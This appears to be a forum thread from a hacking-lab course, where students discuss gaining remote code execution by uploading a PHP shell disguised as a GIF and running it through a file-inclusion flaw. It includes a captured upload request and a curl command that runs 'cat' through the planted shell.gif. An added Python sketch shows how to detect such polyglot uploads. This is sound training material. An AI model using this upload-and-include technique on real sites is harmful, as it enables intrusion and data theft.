[File Inclusion][LFI and File Uploads]

Hey guys, can someone help me with this question?
Use any of the techniques covered in this section to gain RCE and read the flag at /
I go to this URL, http://159.65.81.40:30186/settings.php, and it just gives me a "file not allowed" error when I click on upload. I saw the requests with Burp, and this is the POST request after clicking the upload button. Can somebody help me please?

POST /upload.php HTTP/1.1
Host: 159.65.81.40:30186
Content-Length: 150
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXGg68SiXvWXYKlUF
Origin: http://159.65.81.40:30186
Referer: http://159.65.81.40:30186/settings.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryXGg68SiXvWXYKlUF
Content-Disposition: form-data; name="uploadFile"

undefined
------WebKitFormBoundaryXGg68SiXvWXYKlUF--

You have to create the code and save it as a gif, upload the file, and then execute it. In the end, where it says =id, you can keep changing to search for the file path.

Hi, I’m also having trouble with this. I did just as the section said and created a code and saved it as a gif. When I uploaded it, it worked and it did show id. When I list the / directory I also found a txt file, which contains the string “GIF8” in it; unfortunately, it is not the answer to the question. I’m really stuck and don’t know what to do.

1 Like

The file has the magic bytes prefixing it. Drop the GIF8 and cat the file.

curl -s "http://<SERVER>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=cat+/2f40d853e2d4768d87da1c81772bae0a.txt" | grep HTB

3 Likes
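Added example, not part of the thread or of the lab's code: a defender-side sketch of why an upload filter that trusts the "GIF8" magic bytes accepts the kind of file discussed above, next to a stricter check that rejects it. The function names, the heuristics and both sample byte strings are assumptions constructed for illustration.

```python
import re
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")
# Heuristic: tags PHP executes wherever they occur in an included file.
PHP_TAG = re.compile(rb"<\?php|<\?=", re.IGNORECASE)


def magic_only_check(data: bytes) -> bool:
    """Weak filter (assumed): trusts the first four bytes only."""
    return data.startswith(b"GIF8")


def strict_gif_check(data: bytes) -> list:
    """Return reasons to reject the upload; an empty list means accept."""
    problems = []
    if data[:6] not in GIF_SIGNATURES:
        problems.append("bad signature")
    elif len(data) < 13:
        problems.append("truncated header")
    else:
        # Logical screen width and height, little-endian, follow the signature.
        width, height = struct.unpack("<HH", data[6:10])
        if width == 0 or height == 0:
            problems.append("zero dimensions")
    if not data.endswith(b"\x3b"):  # every GIF stream ends with the 0x3B trailer
        problems.append("missing trailer")
    if PHP_TAG.search(data):
        problems.append("embedded PHP tag")
    return problems


# Constructed sample inputs (not taken from the thread).
VALID_GIF = bytes.fromhex(
    "474946383961 0100 0100 80 00 00 000000 ffffff"
    "21f904 01000000 00 2c 00000000 01000100 00 02 02 4401 00 3b"
)
POLYGLOT = b"GIF8" + b"<?php echo 'harmless marker'; ?>"

if __name__ == "__main__":
    for name, blob in (("valid.gif", VALID_GIF), ("polyglot.gif", POLYGLOT)):
        print(name, "magic-only:", magic_only_check(blob),
              "strict:", strict_gif_check(blob) or "accept")
```

Content checks like these are heuristics and can misfire on real images; the durable fixes are re-encoding uploads server-side and never passing a user-controlled path such as the `language` parameter to an include.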

Thank you so much, the magic bytes prefixing part is where it stumped me, and I’m not that good with curl. Thank you so much for the help.

1 Like